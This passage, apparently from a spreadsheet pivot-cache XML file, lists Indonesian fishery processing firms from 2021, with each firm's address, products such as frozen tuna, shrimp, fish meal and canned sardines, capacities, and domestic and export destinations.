    <n v="240856"/>
    <m/>
    <s v="Japan, United Arab Emirates"/>
  </r>
  <r>
    <n v="25135"/>
    <x v="1131"/>
    <s v="PT. PARLEVLIET PARABA SEAFOOD"/>
    <s v="Jl. Jembatan Tua No.89, Kel. Bontoa, Kec. Mandai, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Segar"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="10250"/>
    <m/>
    <s v="Australia, Japan, Netherlands, United Arab Emirates"/>
  </r>
  <r>
    <n v="25136"/>
    <x v="1131"/>
    <s v="PT. PARLEVLIET PARABA SEAFOOD"/>
    <s v="Jl. Jembatan Tua No.89, Kel. Bontoa, Kec. Mandai, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Beku (Lemadang, Marlin, Tenggiri, Pedang)"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="13934"/>
    <m/>
    <s v="Guadeloupe, Italy"/>
  </r>
  <r>
    <n v="25137"/>
    <x v="1131"/>
    <s v="PT. PARLEVLIET PARABA SEAFOOD"/>
    <s v="Jl. Jembatan Tua No.89, Kel. Bontoa, Kec. Mandai, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Kaneke, Kakatua, Laccukang, Kakap, Kurisi, Barramundi)"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="25138"/>
    <x v="1131"/>
    <s v="PT. PARLEVLIET PARABA SEAFOOD"/>
    <s v="Jl. Jembatan Tua No.89, Kel. Bontoa, Kec. Mandai, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Beku (Kaneke, Kakatua, Laccukang, Kakap, Kurisi, Barramundi)"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="25139"/>
    <x v="1131"/>
    <s v="PT. PARLEVLIET PARABA SEAFOOD"/>
    <s v="Jl. Jembatan Tua No.89, Kel. Bontoa, Kec. Mandai, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Segar (Lemadang, Marlin, Tenggiri, Todak)"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="25143"/>
    <x v="1132"/>
    <s v="PT. INTIMAS SURYA"/>
    <s v="Jl. Muara Baru Ujung Blok E No.1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Kembung, Marlin, Semar, Gindara, Cakalang, Pedang)"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="300"/>
    <m/>
    <s v="Japan, Mauritius, United States"/>
  </r>
  <r>
    <n v="25144"/>
    <x v="1132"/>
    <s v="PT, INTIMAS SURYA"/>
    <s v="Jl, Muara Baru Ujung Blok E No,1, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Denpasar"/>
    <s v="Japan, Malaysia, Mauritius, Singapore, United States"/>
  </r>
  <r>
    <n v="25145"/>
    <x v="1132"/>
    <s v="PT. INTIMAS SURYA"/>
    <s v="Jl. Muara Baru Ujung Blok E No.1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Segar"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="500"/>
    <s v="Kota Denpasar"/>
    <s v="Japan, Malaysia, Singapore, Taiwan, Province of China, United States"/>
  </r>
  <r>
    <n v="25146"/>
    <x v="1132"/>
    <s v="PT. INTIMAS SURYA"/>
    <s v="Jl. Muara Baru Ujung Blok E No.1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Gulama, Emperor, Kuwe, Kerapu, Layur, Kakatua, Bawal, Kakap)"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Denpasar"/>
    <s v="Japan, Malaysia, Mauritius, Singapore, United States"/>
  </r>
  <r>
    <n v="25147"/>
    <x v="1132"/>
    <s v="PT. INTIMAS SURYA"/>
    <s v="Jl. Muara Baru Ujung Blok E No.1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Beku"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="300"/>
    <s v="Kota Denpasar"/>
    <s v="Japan, Malaysia, Singapore, United States"/>
  </r>
  <r>
    <n v="25149"/>
    <x v="1078"/>
    <s v="UD. LYVIA NUSA BOGA"/>
    <s v="Griya Paniki Indah, Kel. Kairagi, Kec. Mapanget, Kota Manado&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Sambal Roa"/>
    <d v="2021-04-27T00:00:00"/>
    <n v="50"/>
    <s v="Kota Jakarta Pusat, Kota Manado"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="25152"/>
    <x v="1133"/>
    <s v="UD. BINA MAKMUR"/>
    <s v="Lingkungan Teleng RT 01 RW 11, Kel. Sidoharjo, Kec. Pacitan, Kabupaten Pacitan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Nugget Ikan, Tahu Bakso Ikan)"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="3000"/>
    <s v="Kota Jakarta Timur, Kota Semarang, Kota Yogyakarta, Kabupaten Pacitan, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="25153"/>
    <x v="1133"/>
    <s v="UD. BINA MAKMUR"/>
    <s v="Lingkungan Teleng RT 01 RW 11, Kel. Sidoharjo, Kec. Pacitan, Kabupaten Pacitan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Abon Tuna"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="3000"/>
    <s v="Kota Jakarta Timur, Kota Yogyakarta, Kabupaten Pacitan, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="25154"/>
    <x v="1134"/>
    <s v="PT. CDF INDONESIA"/>
    <s v="Desa Kauditan I Jaga IV, Kec. Kauditan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Kayu"/>
    <d v="2021-06-03T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="Taiwan, Province of China"/>
  </r>
  <r>
    <n v="25155"/>
    <x v="1134"/>
    <s v="PT. CDF INDONESIA"/>
    <s v="Desa Kauditan I Jaga IV, Kec. Kauditan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tepung Ikan"/>
    <d v="2021-06-03T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="Taiwan, Province of China"/>
  </r>
  <r>
    <n v="25156"/>
    <x v="35"/>
    <s v="CV. INDO PACIFIC"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jl. Tuna III No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Gelembung Ikan Kering"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Jakarta Utara, Kota Bandung, Kabupaten Rembang, Kota Surabaya"/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25157"/>
    <x v="1129"/>
    <s v="PT. USAHA LAUT PANIPAHAN"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke, Jl. Pendaratan Ikan No.2, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Daging Tuna Beku"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Tegal"/>
    <m/>
  </r>
  <r>
    <n v="25158"/>
    <x v="1135"/>
    <s v="PT. SARI LAUT JAYA FOOD PRODUCTS"/>
    <s v="Jl. Sampangan B1/A, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tepung Ikan"/>
    <d v="2021-06-28T00:00:00"/>
    <n v="16000000"/>
    <s v="Kabupaten Banyuwangi"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="25160"/>
    <x v="961"/>
    <s v="PT. BERJAYA USAHA SAKTI"/>
    <s v="Jl. Gabion No.16 LK XI, Kel. Bagan Deli, Kec. Medan Belawan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Daging Kerang Rebus Beku"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="400000"/>
    <s v="Kota Pekanbaru, Kota Jakarta Utara"/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="25161"/>
    <x v="961"/>
    <s v="PT. BERJAYA USAHA SAKTI"/>
    <s v="Jl. Gabion No.16 LK XI, Kel. Bagan Deli, Kec. Medan Belawan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Beku"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="400000"/>
    <s v="Kota Pekanbaru, Kota Jakarta Utara"/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="25162"/>
    <x v="1136"/>
    <s v="PT. BLUE STAR ANUGRAH"/>
    <s v="Jl. DI Panjaitan No. 01 RT 001 RW 001, Kel. Saradan, Kec. Pemalang, Kabupaten Pemalang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Daging Rajungan Pasteurisasi Kaleng"/>
    <d v="2021-06-10T00:00:00"/>
    <n v="400"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="25163"/>
    <x v="1137"/>
    <s v="CV. PRIMA INDO TUNA"/>
    <s v="Jl. Prof. Dr. Ir. Sutami No.32, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Beku"/>
    <d v="2021-04-29T00:00:00"/>
    <n v="801265"/>
    <m/>
    <s v="Netherlands, Russian Federation, United States"/>
  </r>
  <r>
    <n v="25164"/>
    <x v="1137"/>
    <s v="CV. PRIMA INDO TUNA"/>
    <s v="Jl. Prof. Dr. Ir. Sutami No.32, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Segar"/>
    <d v="2021-04-29T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="25165"/>
    <x v="1137"/>
    <s v="CV. PRIMA INDO TUNA"/>
    <s v="Jl. Prof. Dr. Ir. Sutami No.32, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakap)"/>
    <d v="2021-04-29T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="25166"/>
    <x v="1137"/>
    <s v="CV. PRIMA INDO TUNA"/>
    <s v="Jl. Prof. Dr. Ir. Sutami No.32, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Kerapu, Kakap)"/>
    <d v="2021-04-29T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="25167"/>
    <x v="1137"/>
    <s v="CV. PRIMA INDO TUNA"/>
    <s v="Jl. Prof. Dr. Ir. Sutami No.32, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-04-29T00:00:00"/>
    <n v="52748"/>
    <m/>
    <s v="Russian Federation"/>
  </r>
  <r>
    <n v="25168"/>
    <x v="1137"/>
    <s v="CV. PRIMA INDO TUNA"/>
    <s v="Jl. Prof. Dr. Ir. Sutami No.32, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Beku (Tembang, Marlin, Layaran, Cakalang)"/>
    <d v="2021-04-29T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="25169"/>
    <x v="475"/>
    <s v="PT. INTI MULIA CAHAYA"/>
    <s v="Kompleks Pelabuhan Paotere Makassar, Kel. Gusung, Kec. Ujung Tanah, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Kakap Putih, Swanggi, Kerapu, Kaneke, Kakatua, Bawal, Layur)"/>
    <d v="2021-05-18T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Hong Kong, Malaysia, Saudi Arabia, Singapore"/>
  </r>
  <r>
    <n v="25170"/>
    <x v="475"/>
    <s v="PT. INTI MULIA CAHAYA"/>
    <s v="Kompleks Pelabuhan Paotere Makassar, Kel. Gusung, Kec. Ujung Tanah, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Segar (Kuwe, Lemadang, Cakalang, Tenggiri)"/>
    <d v="2021-05-18T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Hong Kong, Malaysia, Saudi Arabia, Singapore"/>
  </r>
  <r>
    <n v="25171"/>
    <x v="475"/>
    <s v="PT. INTI MULIA CAHAYA"/>
    <s v="Kompleks Pelabuhan Paotere Makassar, Kel. Gusung, Kec. Ujung Tanah, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Segar"/>
    <d v="2021-05-18T00:00:00"/>
    <n v="3000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Hong Kong, Malaysia, Saudi Arabia, Singapore"/>
  </r>
  <r>
    <n v="25172"/>
    <x v="475"/>
    <s v="PT. INTI MULIA CAHAYA"/>
    <s v="Kompleks Pelabuhan Paotere Makassar, Kel. Gusung, Kec. Ujung Tanah, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Segar"/>
    <d v="2021-05-18T00:00:00"/>
    <n v="2500"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Hong Kong, Malaysia, Saudi Arabia, Singapore"/>
  </r>
  <r>
    <n v="25173"/>
    <x v="1138"/>
    <s v="PT, KAMILA SAMUDERA MAKMUR"/>
    <s v="Jl, Dermaga PHPT Blok B No 3 - 4, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="3000000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Utara, Kota Bogor, Kota Bandung, Kota Bekasi, Kota Depok"/>
    <s v="China, Korea, Democratic People's Republic of, Taiwan, Province of China, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25174"/>
    <x v="1138"/>
    <s v="PT, KAMILA SAMUDERA MAKMUR"/>
    <s v="Jl, Dermaga PHPT Blok B No 3 - 4, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Barramundi, Kerapu, Lencam, Kerapu, Layur, Kakap, Baronang)"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Utara, Kota Bandung, Kota Bekasi, Kota Depok"/>
    <s v="Australia, China, Korea, Democratic People's Republic of, Taiwan, Province of China, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25175"/>
    <x v="1138"/>
    <s v="PT, KAMILA SAMUDERA MAKMUR"/>
    <s v="Jl, Dermaga PHPT Blok B No 3 - 4, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Lemuru, Deho, Kembung, Lemadang, Salem, Muroaji, Cakalang, Tenggiri)"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Utara, Kota Bogor, Kota Bandung, Kota Bekasi, Kota Depok"/>
    <s v="Australia, China, Korea, Democratic People's Republic of, Taiwan, Province of China, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25176"/>
    <x v="1138"/>
    <s v="PT. KAMILA SAMUDERA MAKMUR"/>
    <s v="Jl. Dermaga PHPT Blok B No 3 - 4, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Utara, Kota Bogor, Kota Bandung, Kota Bekasi, Kota Depok"/>
    <s v="Australia, China, Korea, Democratic People's Republic of, Taiwan, Province of China, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25177"/>
    <x v="99"/>
    <s v="PT. DHARMA SAMUDERA FISHING INDUSTRIES"/>
    <s v="Jl. Laks. RE. Martadinata I, Kel. Tanjung Priok, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Lobster Beku"/>
    <d v="2021-04-16T00:00:00"/>
    <n v="15000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="25178"/>
    <x v="493"/>
    <s v="PT. KELOLA BIRU HARMONI"/>
    <s v="Jl. Industri II, Kel. Tanjung Priok, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Lobster Beku"/>
    <d v="2021-04-19T00:00:00"/>
    <n v="7500"/>
    <m/>
    <s v="China, France, Korea, Democratic People's Republic of, United States"/>
  </r>
  <r>
    <n v="25181"/>
    <x v="223"/>
    <s v="PT. INSAN CITRAPRIMA SEJAHTERA"/>
    <s v="Jl. Raya Jenu - Merak Urak No.148 C, Kel. Sekardadi, Kec. Jenu, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Teri Nasi Kammage"/>
    <d v="2021-05-03T00:00:00"/>
    <n v="8250"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="25183"/>
    <x v="1040"/>
    <s v="UD. HIKMAH SAMUDERA"/>
    <s v="RT 05 RW 01, Dusun Craken, Kel. Sumberharjo, Kec. Pacitan, Kabupaten Pacitan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sambal Tuna"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="3000"/>
    <s v="Kota Jakarta Timur, Kota Semarang, Kota Yogyakarta, Kabupaten Pacitan, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="25184"/>
    <x v="1040"/>
    <s v="UD. HIKMAH SAMUDERA"/>
    <s v="RT 05 RW 01, Dusun Craken, Kel. Sumberharjo, Kec. Pacitan, Kabupaten Pacitan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Serundeng Ikan "/>
    <d v="2021-04-20T00:00:00"/>
    <n v="2500"/>
    <s v="Kota Jakarta Timur, Kota Surakarta, Kota Yogyakarta, Kabupaten Pacitan, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="25185"/>
    <x v="1135"/>
    <s v="PT. SARI LAUT JAYA FOOD PRODUCTS"/>
    <s v="Jl. Sampangan B1/A, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sarden Kaleng, Makerel Kaleng"/>
    <d v="2021-06-28T00:00:00"/>
    <n v="9000000"/>
    <s v="Kota Palembang, Kota Surabaya, Kota Pontianak, Kota Samarinda, Kabupaten Nabire"/>
    <s v="Gabon, Ghana, India, Japan, South Africa"/>
  </r>
  <r>
    <n v="25186"/>
    <x v="1139"/>
    <s v="CV. ANUGERAH SAMUDERA"/>
    <s v="Jl. Raya Perancis Pergudangan Kosambi Permai Extention Blok O No.12A, Kel. Belimbing, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Rendang Belut"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara, Kota Bandung, Kabupaten Cilacap"/>
    <m/>
  </r>
  <r>
    <n v="25187"/>
    <x v="1139"/>
    <s v="CV. ANUGERAH SAMUDERA"/>
    <s v="Jl. Raya Perancis Pergudangan Kosambi Permai Extention Blok O No.12A, Kel. Belimbing, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerang Segar"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="45000"/>
    <s v="Kota Jakarta Pusat, Kota Jakarta Utara, Kabupaten Bandung"/>
    <m/>
  </r>
  <r>
    <n v="25188"/>
    <x v="1139"/>
    <s v="CV. ANUGERAH SAMUDERA"/>
    <s v="Jl. Raya Perancis Pergudangan Kosambi Permai Extention Blok O No.12A, Kel. Belimbing, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Rumput Laut Berbumbu"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="55000"/>
    <s v="Kota Jakarta Pusat, Kota Jakarta Utara, Kabupaten Bandung, Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="25189"/>
    <x v="1139"/>
    <s v="CV. ANUGERAH SAMUDERA"/>
    <s v="Jl. Raya Perancis Pergudangan Kosambi Permai Extention Blok O No.12A, Kel. Belimbing, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Salmon Segar, Trout Segar"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="40000"/>
    <s v="Kota Jakarta Utara, Kabupaten Bandung, Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="25190"/>
    <x v="1139"/>
    <s v="CV. ANUGERAH SAMUDERA"/>
    <s v="Jl. Raya Perancis Pergudangan Kosambi Permai Extention Blok O No.12A, Kel. Belimbing, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerang Beku"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="52000"/>
    <s v="Kota Jakarta Pusat, Kota Jakarta Utara, Kabupaten Bandung, Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="25191"/>
    <x v="1139"/>
    <s v="CV. ANUGERAH SAMUDERA"/>
    <s v="Jl. Raya Perancis Pergudangan Kosambi Permai Extention Blok O No.12A, Kel. Belimbing, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Beku (Alaska Pollock, Capelin, Kembung, Makerel, Salem, Selar Kuning)"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Jakarta Pusat, Kota Jakarta Utara, Kabupaten Bandung, Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="25192"/>
    <x v="1139"/>
    <s v="CV. ANUGERAH SAMUDERA"/>
    <s v="Jl. Raya Perancis Pergudangan Kosambi Permai Extention Blok O No.12A, Kel. Belimbing, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Telur Salmon Beku"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="50"/>
    <s v="Kota Jakarta Pusat, Kota Jakarta Utara, Kabupaten Bandung, Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="25193"/>
    <x v="1139"/>
    <s v="CV. ANUGERAH SAMUDERA"/>
    <s v="Jl. Raya Perancis Pergudangan Kosambi Permai Extention Blok O No.12A, Kel. Belimbing, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="53000"/>
    <s v="Kota Jakarta Pusat, Kota Jakarta Utara, Kabupaten Bandung, Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="25194"/>
    <x v="1139"/>
    <s v="CV. ANUGERAH SAMUDERA"/>
    <s v="Jl. Raya Perancis Pergudangan Kosambi Permai Extention Blok O No.12A, Kel. Belimbing, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Jakarta Pusat, Kota Jakarta Utara, Kabupaten Bandung, Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="25195"/>
    <x v="1139"/>
    <s v="CV. ANUGERAH SAMUDERA"/>
    <s v="Jl. Raya Perancis Pergudangan Kosambi Permai Extention Blok O No.12A, Kel. Belimbing, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Daging Tuna Beku"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Pusat, Kota Jakarta Utara, Kabupaten Bandung, Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="25196"/>
    <x v="1139"/>
    <s v="CV. ANUGERAH SAMUDERA"/>
    <s v="Jl. Raya Perancis Pergudangan Kosambi Permai Extention Blok O No.12A, Kel. Belimbing, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Gurita Berbumbu"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="49000"/>
    <s v="Kota Jakarta Pusat, Kota Jakarta Utara, Kabupaten Bandung, Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="25197"/>
    <x v="1139"/>
    <s v="CV. ANUGERAH SAMUDERA"/>
    <s v="Jl. Raya Perancis Pergudangan Kosambi Permai Extention Blok O No.12A, Kel. Belimbing, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Salmon Asap"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="45000"/>
    <s v="Kota Jakarta Pusat, Kota Jakarta Utara, Kabupaten Bandung, Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="25198"/>
    <x v="1140"/>
    <s v="PT. JALUR SUTERA MAS"/>
    <s v="Pergudangan Kosambi Permai Blok D No.1, Jl. Raya Perancis, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Tuna Beku"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Philippines, Viet Nam"/>
  </r>
  <r>
    <n v="25199"/>
    <x v="1140"/>
    <s v="PT. JALUR SUTERA MAS"/>
    <s v="Pergudangan Kosambi Permai Blok D No.1, Jl. Raya Perancis, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Tuna Cakalang)"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Philippines, Viet Nam"/>
  </r>
  <r>
    <n v="25200"/>
    <x v="1140"/>
    <s v="PT. JALUR SUTERA MAS"/>
    <s v="Pergudangan Kosambi Permai Blok D No.1, Jl. Raya Perancis, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Beku (Kakap, Sebelah, Kerapu, Kurisi, Kakap, Ikan Sebelah)"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25201"/>
    <x v="1140"/>
    <s v="PT. JALUR SUTERA MAS"/>
    <s v="Pergudangan Kosambi Permai Blok D No.1, Jl. Raya Perancis, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Beku (Sotong, Cumi-cumi)"/>
    <d v="2021-06-07T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="25202"/>
    <x v="228"/>
    <s v="UD, SISCA"/>
